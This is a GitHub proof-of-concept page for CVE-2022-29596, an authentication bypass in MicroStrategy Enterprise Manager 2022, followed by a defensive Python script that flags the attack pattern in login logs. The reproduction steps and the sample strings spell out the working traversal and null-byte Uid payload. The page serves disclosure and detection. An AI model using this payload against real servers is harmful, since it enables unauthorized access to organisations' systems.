CVE-2022-29596: MicroStrategy-Enterprise-Manager-2022/poc at main · haxpunk1337/MicroStrategy-Enterprise-Manager-2022
MicroStrategy Enterprise Manager 2022 allows authentication bypass by triggering a login failure and then entering the Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=any_password&ConnMode=1&3054=Login substring for directory traversal.
haxpunk1337 Update poc
Latest commit fc99390 Apr 23, 2022
Product: MicroStrategy Enterprise Manager - Version 2022
Steps to reproduce
Visit: https://localhost/MicroStrategy/servlet/mstrWeb
Now give any username and password
Got Login Failure
Now manipulate the Uid value as
Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=aa&ConnMode=1&3054=Login
Login bypassed
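
For defenders, the Uid pattern in the steps above (a dot-dot path segment plus an encoded null byte) can be flagged in logged login form data. This is an added example, not part of the original PoC or of MicroStrategy's code; the function names and sample strings are constructed, and it assumes the login parameters are available as a form-encoded string.

```python
import re
from urllib.parse import unquote

# ".." as a whole path segment, with either slash style.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def uid_findings(form_data):
    """Return the reasons the Uid field of a form-encoded string is suspicious."""
    findings = []
    for pair in form_data.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() != "uid":
            continue
        value = decode_fully(raw)
        if TRAVERSAL.search(value):
            findings.append("traversal")
        if "\x00" in value:
            findings.append("null-byte")
    return findings

# Constructed sample inputs (not captured traffic).
SAMPLES = [
    "Uid=alice&Pwd=x&ConnMode=1&3054=Login",
    "Uid=/../../windows/win.ini%00.jpg&Pwd=x&ConnMode=1&3054=Login",
    "Uid=%252e%252e%255cwindows%255cwin.ini&Pwd=x&ConnMode=1&3054=Login",
]

def scan(samples):
    """Map each sample to its findings, keeping only the suspicious ones."""
    return {s: f for s in samples if (f := uid_findings(s))}

if __name__ == "__main__":
    for sample, reasons in scan(SAMPLES).items():
        print(reasons, sample)
```

A user identifier has no legitimate reason to contain path separators or a null byte, so any finding on this field is worth an alert.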